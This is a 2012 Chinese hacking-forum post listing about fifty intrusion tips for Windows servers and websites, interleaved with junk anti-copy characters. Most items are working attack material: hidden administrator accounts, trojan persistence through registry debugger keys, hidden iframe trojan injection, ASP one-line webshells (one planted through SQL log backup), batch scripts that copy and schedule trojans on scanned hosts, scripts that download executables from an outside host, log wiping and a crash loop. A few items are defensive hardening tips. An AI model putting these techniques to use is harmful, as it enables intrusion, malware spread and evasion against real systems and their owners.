找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2296|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
0 F5 Y4 T  l+ `/ ]! w+ v3 jcacls C:\windows\system32 /G hqw20:R9 ?" E9 b; h" e; l
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
  [; {* J1 k: |4 _  F( f- n恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F3 j! ~6 ~& a5 K. z; x! D
2 V5 l& _: x- l% @& P7 L
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
9 [8 ^: M2 C9 u! T2 W3 K
# e  p  A$ g3 R# e/ z0 \% a3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。% S/ R# W! L+ p/ N! Z0 A' J  }$ S1 F
9 ~/ `0 r1 D3 w* R2 d) |
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号- ]& x) ^, E4 a9 V# _* ~. h
1 a* |* z. O0 E$ ]7 M3 t4 G3 K
5、利用INF文件来修改注册表" R7 j5 j' u' j% `! `6 x; K
[Version]
  s% e( x- t1 Y. gSignature="$CHICAGO$"
6 n5 S; k' e$ A# {[Defaultinstall]
( x# ^+ D9 x0 G  c7 KaddREG=Ating
) I/ M: g% @% L# p[Ating]9 [5 M9 z- v0 ?* \$ U
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
" C9 _# E9 K- t- J; R, J* @4 i以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:' ]; d" S# U4 ~. u# M2 [/ k% q1 u
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径0 b0 s8 I9 r/ E6 o  w2 ]2 ?
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
! l4 I; H% h4 C, P6 R8 DHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU- t* x& q$ g2 c9 T* ]
HKEY_CURRENT_CONFIG 简写为 HKCC) ?, x$ r5 n0 ~, \; G2 A( [( ^( p
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
' e* C" R" x4 X4 A, {: k"1"这里代表是写入或删除注册表键值中的具体数据
( h4 Z' y6 v% Z! A3 k; G8 d* x# Q  A0 x% N! a2 m( ]9 B% K# H4 s
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
7 z" g  R" f7 `( p% N$ ?% |多了一步就是在防火墙里添加个端口,然后导出其键值
7 J( O; E! u2 [, h[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]( G; X8 O/ T2 V2 H& j; R
: T1 \6 @/ y; D1 D7 [" A; |7 p
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽/ z0 S6 |, L" ~; K0 j, |
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
6 J8 T% H/ b; k% d  t- E5 u5 I8 S3 c& F3 r- J% T5 T2 A
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
) b0 p' P1 ^) O
) d# X, D" Y8 o9 [6 b. T- B' I9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
7 c! S) B# y9 A/ t/ U9 H0 E可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。- ]2 L: a- R6 m
+ W( G* N0 F4 _5 g- T" a3 E
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”* z5 |' {. n% B' Z
1 Z* I  W% H' i2 t9 z3 B) U2 x
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
9 _% }* J2 ~) j% s( M9 w, F2 A$ F用法:xsniff –pass –hide –log pass.txt$ k0 _# C1 N. I. w2 J* o9 E
; q+ _  T' @. I& {1 H( x
12、google搜索的艺术
& E8 J. q9 j  l' U, K搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
, C! z) ?" Q4 C( V或“字符串的语法错误”可以找到很多sql注入漏洞。
3 v2 u, Z) x* G/ K& @0 `- r) o( p' o  |$ t4 }1 V$ n3 D
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
- [$ H' j% Q- D$ A& n7 z
% j  c/ F/ A. l( n+ Z2 s) A14、cmd中输入 nc –vv –l –p 1987
6 j1 v# E9 @. a$ [/ k% G做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃8 v3 D) Z2 ]- A  p2 @  c
* K: U3 o' q8 B4 r$ j( \; |
15、制作T++木马,先写个ating.hta文件,内容为& l# N7 G* L3 `/ p
<script language="VBScript">- |: _; |4 m3 T1 K$ J, ?
set wshshell=createobject ("wscript.shell" )  f6 W2 a8 e5 A& v2 U) o
a=wshshell.run("你马的名称",1)
( s, g1 S5 T4 s7 Z( u& [window.close
5 x2 D9 H8 C: t' b7 y' N</script>" s  ~- L' ^6 y, s6 T
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
/ ]- R+ N8 C- Q. W' B
7 v4 t! u5 T5 Z' h6 V16、搜索栏里输入$ e( A' l$ h" o, T  E; X( u
关键字%'and 1=1 and '%'=', |& q. h) [3 w& ]
关键字%'and 1=2 and '%'='
& z' w3 ]$ `0 F! `. \比较不同处 可以作为注入的特征字符
" w9 C' A4 C3 J+ U5 }8 L' Z3 C. n) W8 ^+ J6 d0 k( P5 C
17、挂马代码<html>
7 C1 o3 |7 o" _! X<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
! K6 c: @. Q( `7 N; N$ ^</html>+ l5 i: _1 |# a& K: I

& d) V5 [4 w' q$ V8 y. a18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,  f# w+ x& T& ]$ M7 `5 w+ }" ]
net localgroup administrators还是可以看出Guest是管理员来。  c, I" d# B2 Q1 v+ G' K/ l+ d
1 t1 N: N( s1 E: ^
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等- a. N2 T6 U' L; W4 C
用法: 安装: instsrv.exe 服务名称 路径
0 g/ ]3 q6 c* _7 D' W7 ^! F卸载: instsrv.exe 服务名称 REMOVE+ _$ O$ r7 h( \0 a4 ?; h5 @

, s6 I& Q6 {; E6 _; I/ S8 y' U" ^; I! p! a- m+ s
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
3 |  g5 O2 P, T5 o2 n不能注入时要第一时间想到%5c暴库。% K. U; n+ _! a" ?' \* R
  `+ h8 v  [0 r5 r" X/ f3 d
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~  x6 o! H2 l' R

4 L2 J6 j: e0 h, f7 X- T7 e$ E23、缺少xp_cmdshell时4 O' l  J4 {/ U: B+ t
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
# G( u% @" h, [% i5 y假如恢复不成功,可以尝试直接加用户(针对开3389的)
; [+ Z7 I& ?1 G: e# b& udeclare @o int6 h3 z( @* y2 ~3 P# c
exec sp_oacreate 'wscript.shell',@o out  f5 ]9 q6 M! Z7 J# k' [
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员6 G! X7 c5 R  ^/ u) Y  J0 q

9 `; h' ]1 X2 D  U  c& j24.批量种植木马.bat
' m: `; B( ?& {: rfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
: p" O" E9 L1 Z5 cfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间6 E- B6 t' f# z: y/ q9 K6 v
扫描地址.txt里每个主机名一行 用\\开头$ }" p0 H+ j" @& y& A% ~7 _
- `$ s+ S& _1 N7 K7 F
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。, C  [5 K' L! K# J3 ^5 w
, G1 ]2 w8 ]2 N( s/ g; A
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
" f7 ]5 `: r" \3 N/ J将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.& ^  D) W. y# v+ S7 X; u' F
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马4 c$ u0 `! K6 W

$ W. A1 d" T( t; o! y# |27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP+ R$ U$ L6 p& ~' B6 m
然后用#clear logg和#clear line vty *删除日志
5 T' V. U2 [% f5 r4 P0 [& g* I6 s' z3 i0 \" U# u( B% G, q0 ]
28、电脑坏了省去重新安装系统的方法) @# x6 R$ k, l
纯dos下执行,
# n9 x2 c/ z! X6 a- ^3 rxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
9 K4 ^: m3 {+ w/ d( ~2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
- }: E# H3 C& t  n  T
/ }7 U* W; A$ i9 S29、解决TCP/IP筛选 在注册表里有三处,分别是:+ x8 t- S" t: f* v; }: ~# p
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
/ L# }+ Q/ D- G8 XHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
0 y, K/ A' ?0 Q' u& S! fHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- M! F* w% S( j" [) Z7 E$ h: |分别用% p/ q: V0 l. V+ u& S4 G
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
% e+ s9 I8 z, j! P% O$ tregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip9 E% r: G, ~4 T* q0 v- u2 I% L3 i
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
( L; r5 F4 z) o! S5 n: Z命令来导出注册表项2 k* L) l: U; E% r* y! o3 X. t: T
然后把三个文件里的EnableSecurityFilters"=dword:00000001,( J( L, z& L* @8 t" k' H2 T
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用3 F: N8 ]2 h$ b& l: v2 D
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。4 L; N, \% Z" h% s- n

* N# i# M) C7 B- ^30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
4 }  e/ F! S- d. D' ?8 x( LSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
2 O+ R1 [+ U' X; k+ i' [2 L0 M6 p- w& b
31、全手工打造开3389工具  n( V) p: _8 p& ?- `
打开记事本,编辑内容如下:
# S" X0 u( M( n" F3 \2 Vecho [Components] > c:\sql7 Q% V( r( l; d- l. w
echo TSEnable = on >> c:\sql
8 l+ a% Z! H9 A+ k- C# T  e5 q; Nsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
6 R8 S4 J0 y; T8 e4 a, n/ _6 W编辑好后存为BAT文件,上传至肉鸡,执行: C6 `4 {- q$ J& u' V
7 U/ V+ ?4 Q: E; j3 T- u" k; n
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
7 Q% c; H# F  F1 u/ [: u4 ~+ \8 ]! r( a# }
33、让服务器重启
3 P/ v1 }& d1 a. G3 _写个bat死循环:/ e! `6 P+ U0 h9 ^# }
@echo off
0 w9 T" d/ a5 `; R( M4 |9 ]* C:loop1! o* m/ q: c9 R4 @+ R
cls
/ |6 ~) t( W3 S, p: i3 \start cmd.exe7 K+ g- A: C0 I& @+ _
goto loop1( d  D# y3 W1 T
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
) P1 G2 p! f  E
) V2 ~. y# b9 m7 T6 x% j% w9 T34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
( K. ~( L+ @$ ]0 ^; w@echo off9 g  ~) ]2 A9 I7 z: |/ w
date /t >c:/3389.txt3 X+ |% o0 J: q  W4 _) d/ j' z
time /t >>c:/3389.txt
7 I# ~3 ~- W3 I8 W& mattrib +s +h c:/3389.bat1 i) [7 |7 Q# D  k) O4 Y
attrib +s +h c:/3389.txt
3 a+ f2 L$ O* J  Znetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt5 @0 p; a; m8 X! A* x. w
并保存为3389.bat1 J- T: k' Q+ o0 }* ]0 f
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
9 N$ |- H. |* G% \9 i2 F$ v! C- `3 }- T
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
1 _# G  Y0 Y# N) v2 l! Dstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
3 X! R1 y6 l0 X, r输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
. I" N. I' X$ S3 H. }6 J5 j
# V2 J& O; l/ p7 R36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
6 e4 ?' w) u8 K( v1 S  o& _: @1 N1 Iecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址* ~# {% O+ V! Y1 R% d5 ?1 Q
echo 你的FTP账号 >>c:\1.bat //输入账号# I8 E% D! s1 x0 ~
echo 你的FTP密码 >>c:\1.bat //输入密码
( y$ @  Q1 C7 K0 F% k. D, P2 d: decho bin >>c:\1.bat //登入6 |: J0 l# H: p0 m. T
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
% s7 u! x) K. c( Y; recho bye >>c:\1.bat //退出
! ^7 f# Z$ b. K7 Y+ a然后执行ftp -s:c:\1.bat即可
- g1 S6 b5 i# b- N; K! ~; @1 R; C9 a# O( X  e
37、修改注册表开3389两法$ [+ z. |3 j2 m. T
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表5 i/ N0 L* T' a; q' _! \
echo Windows Registry Editor Version 5.00 >>3389.reg
- t, |* P0 I( N. S$ v) D5 cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg5 H6 E; a* t2 y$ }; n  [
echo "Enabled"="0" >>3389.reg
, \9 N, i; T& f5 m, I; m% cecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows' r7 _& T, ?" o4 I  L
NT\CurrentVersion\Winlogon] >>3389.reg
/ n, e3 W- Y; u% j" I" Eecho "ShutdownWithoutLogon"="0" >>3389.reg4 _+ z7 P( V$ C$ B* ^
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]% t$ w) [) ?0 X2 b
>>3389.reg" j( ?2 r' S. U! C6 {2 r
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg, B1 l5 X) s  ]% Q5 `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
6 y# k* E! J5 S1 l7 h1 o>>3389.reg$ ^' e$ t/ ]* [- g8 c& I# ?
echo "TSEnabled"=dword:00000001 >>3389.reg
. X/ Z. R' a6 ]6 _9 D; J1 j) b0 Aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg6 ]: ?9 @' x( D; P, {/ o; ~3 i
echo "Start"=dword:00000002 >>3389.reg
$ H: P- `% h- [3 H( O6 Yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
5 t3 i* N3 U$ M  x9 C/ P>>3389.reg
$ V+ m9 p: M/ S( d3 e: h4 P9 d# Zecho "Start"=dword:00000002 >>3389.reg. v2 Y: R9 i$ ?0 q- @. y- u
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg# D/ x6 s; p. z) C  D. T* T
echo "Hotkey"="1" >>3389.reg1 H, J! j. _2 a8 F4 V/ z7 M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ Q, U6 F8 v+ l( SServer\Wds\rdpwd\Tds\tcp] >>3389.reg  `7 a: I$ v& D0 ]+ m/ S1 _! R4 A" H
echo "PortNumber"=dword:00000D3D >>3389.reg' y+ f1 U+ c! Z0 p0 n
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 }9 \; M+ C- R9 a, u$ X
Server\WinStations\RDP-Tcp] >>3389.reg
/ w  Z7 [' l2 c( a( L7 B4 ?+ zecho "PortNumber"=dword:00000D3D >>3389.reg( l* _$ t4 j" [' M, \7 x: ?
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
; H: v7 _: i2 a" R# g2 K8 x(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)7 U+ k; A5 j" [' ~9 r
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
* H4 L) ]; u& G1 m(2)winxp和win2003终端开启
  c4 W" Q: Z& d4 K用以下ECHO代码写一个REG文件:
1 S  P& Q4 g- s. U# }: secho Windows Registry Editor Version 5.00>>3389.reg
' U! ^' I' L9 E% @9 |- Iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 i! Z: Z" K; k, M0 O& PServer]>>3389.reg
/ L: J5 ~( |: B; ^. i0 ?" `! jecho "fDenyTSConnections"=dword:00000000>>3389.reg
- n3 z9 H3 {, Oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; C* [; n: C& g! Y6 \# hServer\Wds\rdpwd\Tds\tcp]>>3389.reg" i2 w3 K0 y( b
echo "PortNumber"=dword:00000d3d>>3389.reg  j9 P# \2 l/ L6 g' \% I" w8 F9 c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# P" ?0 Y3 d& Z" Y% `4 Q0 c3 hServer\WinStations\RDP-Tcp]>>3389.reg1 \& E" g. [7 D+ h) ^" W
echo "PortNumber"=dword:00000d3d>>3389.reg
* a) {5 ?2 ^4 D; }' _4 J4 {' w然后regedit /s 3389.reg del 3389.reg3 o2 O4 o. ]4 l. u9 y
XP下不论开终端还是改终端端口都不需重启
3 d" n; v' e0 `8 E& z( j
. r& f4 D, }, J& j9 i; V38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃6 [  |9 d% k$ [# S3 w
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
% m$ x; u  Q8 r: @( k  K: M; f, S  c' Q2 {  t6 b
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!* X  D2 b9 h8 z; T7 J( @  H
(1)数据库文件名应复杂并要有特殊字符
# m" O% x+ R. g* u, O(2)不要把数据库名称写在conn.asp里,要用ODBC数据源8 B0 O! L& V  P, j
将conn.asp文档中的
3 i4 r% ^2 j$ S) G* K. O- H; k) b4 PDBPath = Server.MapPath("数据库.mdb"). ~6 {& x% ?8 L$ r' X& t
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
3 X/ L# X- ]( i' \' J. `! s# E, [9 s5 {  n$ w6 P! }. n
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
) Y# {9 b: [# |& d) w(3)不放在WEB目录里( t2 F1 s1 H% `
+ n+ E/ J6 o2 i9 f5 S
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉4 j6 l, Z1 f9 A. k6 e# S
可以写两个bat文件& A) i( s" |8 E9 w& T4 Y
@echo off
# x$ {; w3 b' Q5 [" m  H+ S' N3 r@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
3 `+ s- ]* Z; s6 S; G@del c:\winnt\system32\query.exe
5 o. g5 {+ Z" E$ S, h5 N7 `: \@del %SYSTEMROOT%\system32\dllcache\query.exe2 |- ]/ N& }* `" c( R
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的, W& N9 C3 u3 }# u# j. W
* h% c7 p% c% h) \% s0 K
@echo off
4 l1 r. I0 P- ]/ h@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
. \- I# u8 Z, T7 I6 k@del c:\winnt\system32\tsadmin.exe- j' g0 C, ?. G. M9 E3 m9 m1 ?6 {
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex# f. B/ y3 i/ r1 i. L$ \
. z2 X/ k. j. K) u7 Z$ U
41、映射对方盘符
+ e% r3 F' A; `. Q1 ?telnet到他的机器上,
/ M9 n7 K+ r% Y% G! ]net share 查看有没有默认共享 如果没有,那么就接着运行
, G6 L' T  g) p; N* snet share c$=c:4 w1 R( A7 h& \/ }& ]3 K, \- M
net share现在有c$
6 z% o; ]& b7 |2 T% r+ w! G) W在自己的机器上运行
8 U; _& t) y, o# N+ Vnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K  q& z. f& u% n4 L- s$ P
9 B% M" d8 x9 I
42、一些很有用的老知识
6 v7 {& S# j6 }0 S  O9 }type c:\boot.ini ( 查看系统版本 ). r; Y0 [  C% ^
net start (查看已经启动的服务)
2 R2 c7 V  M( o$ v6 E  j+ y$ C5 E3 l- Fquery user ( 查看当前终端连接 )
4 p$ b! m) W& ?0 j3 _7 Gnet user ( 查看当前用户 )* O5 ]0 C4 m* m! P! y% V
net user 用户 密码/add ( 建立账号 )3 O! f% j) p7 b* G- O' y. c9 I
net localgroup administrators 用户 /add (提升某用户为管理员), I3 d9 S) Y3 }2 k. y% S
ipconfig -all ( 查看IP什么的 )
) s* A& t( q6 }/ A. W, anetstat -an ( 查看当前网络状态 )
' l/ j. A3 T$ t* A- B  P9 Hfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
1 J3 R- l0 I  N克隆时Administrator对应1F4
# O- j; Q+ B! U) j$ Q- bguest对应1F56 F3 d9 h! R; k% i3 d0 I# O2 H
tsinternetuser对应3E8
2 H, s1 j* ]2 O! l3 j8 f6 T* g( S1 b. c
43、如果对方没开3389,但是装了Remote Administrator Service
5 a' T5 D9 t. e) D0 T7 W* w用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接! z% w9 X, s7 m
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息. [1 }9 t1 q4 }
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
$ B" Y4 t& j% R: I
3 K: F6 @& W, X  v3 Y" ]; B. Z0 f. e44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
" B0 D  c& v/ p7 l( J* C7 j) y- _本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
" m2 E& s3 h  \  L, `6 ~4 ^+ P( u  X/ z1 l
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)! O' E1 j* N4 A% Z5 G0 \
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
) t( B0 @; v0 F, }% A; D  B^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
3 g: P: P$ n5 o/ a& W2 _5 a( JCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
+ u7 C6 E: m  S; `: a& i1 t' J1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
: L+ m  `( \* y1 a9 V7 H(这是完整的一句话,其中没有换行符)! E+ n9 W# l; u2 Y
然后下载:
% d) N3 F$ w- k# gcscript down.vbs http://www.hack520.org/hack.exe hack.exe
0 q3 {7 x7 H2 G! m/ m% o  ]% u0 j2 R& f1 j4 V' Q& `
46、一句话木马成功依赖于两个条件:
: F. d4 @! C1 z5 C- s* n1、服务端没有禁止adodb.Stream或FSO组件
& h0 U2 c/ F% d2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
& |% G# e- v! }5 l) ^$ I* W! \1 ^
: H1 P, ?/ |4 f8 Y( z47、利用DB_OWNER权限进行手工备份一句话木马的代码:
% ~% y3 c4 {) p1 C! ^;alter database utsz set RECOVERY FULL--" u0 a: d' w8 V$ R& P" i7 o) D
;create table cmd (a image)--
& P" Q9 t: C; a; n! B  G0 D;backup log utsz to disk = 'D:\cmd' with init--
* l4 M4 |0 f1 M* ]1 H;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
! A1 @0 q" N* D3 [;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
! ?$ x! b0 F$ f注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
( b0 l% G% L) s4 G. I4 J- n! Z* `' l& Z& ~
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
% d  G6 T, w3 Q2 X# j2 R% ?  m0 k1 d1 v! B% a  T) A4 V
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options5 z5 ]% A- u8 s! g* r, h
所有会话用 'all'。
5 B2 o' F8 x/ c9 M; P-s sessionid 列出会话的信息。
, @; W  z, y1 J+ t# I  [+ e-k sessionid 终止会话。+ U; a9 r$ T1 ^" v
-m sessionid 发送消息到会话。
1 R. \5 G1 @, A1 [! j2 q5 q$ U7 |8 b" a( k  h' S5 ~
config 配置 telnet 服务器参数。
1 C* M. H8 }  G, p/ r$ K" w9 @, T7 j2 N2 }! G# {
common_options 为:  I) e& t# Z% ?& X
-u user 指定要使用其凭据的用户, K' \% e, a8 Y" a
-p password 用户密码8 h1 d# }$ N7 M# U' m) M/ q1 c
* j0 {) g2 Q( p6 }
config_options 为:, o" W6 Y( G& p8 K7 w- T0 W0 \
dom = domain 设定用户的默认域1 G6 v( Z) P, p& R; ~: k2 I
ctrlakeymap = yes|no 设定 ALT 键的映射
( A/ X" i1 t% i$ ntimeout = hh:mm:ss 设定空闲会话超时值
% I8 L0 ~0 }  u8 j6 c4 Q" [timeoutactive = yes|no 启用空闲会话。
0 |3 K. L2 W1 F$ kmaxfail = attempts 设定断开前失败的登录企图数。$ V) n# B, F3 y( K7 r2 l1 F
maxconn = connections 设定最大连接数。9 p1 R& `( I8 Q8 e/ F* x
port = number 设定 telnet 端口。  t$ @5 Z+ o0 B# |
sec = [+/-]NTLM [+/-]passwd
$ b- Y& w+ T2 Z( f- S* M# T设定身份验证机构2 z; |$ N6 w& a3 T# Q
fname = file 指定审计文件名。
+ e" ^9 F/ G5 p& |" D4 Z- B! ?) k4 cfsize = size 指定审计文件的最大尺寸(MB)。1 \6 e+ E5 J: ?9 `: `. J  i, z
mode = console|stream 指定操作模式。' x1 P  _5 x! P" v; D% i9 h
auditlocation = eventlog|file|both
9 ~9 j8 z% h6 K: ^6 z指定记录地点( d' I2 c  g" b" t6 q& x
audit = [+/-]user [+/-]fail [+/-]admin  [' ]. }$ G& T6 q9 S) \* L5 u$ y

5 ~4 S+ \+ R1 M' `49、例如:在IE上访问:9 b) ?9 W' j  [; N
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
& w. x  c6 B/ k3 I, Hhack.txt里面的代码是:
1 }$ u  d3 E1 U% H/ n<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
6 w' Q  {0 l% N- a7 h把这个hack.txt发到你空间就可以了!* c) L# g) j: W/ M& p
这个可以利用来做网马哦!) l2 E4 H: T( J7 y
7 v* R1 \% d# r' m
50、autorun的病毒可以通过手动限制!
) e# _- z+ A; a, m% ]1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!! k: L3 x: \. M  T# \- e
2,打开盘符用右键打开!切忌双击盘符~
: F0 v$ U* p0 {3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!7 M! j9 Y* H" K2 y$ s8 d' w

' W, @: `. i7 T; w2 u6 U6 q' i51、log备份时的一句话木马:: k% o3 u- q2 X4 p; t
a).<%%25Execute(request("go"))%%25>
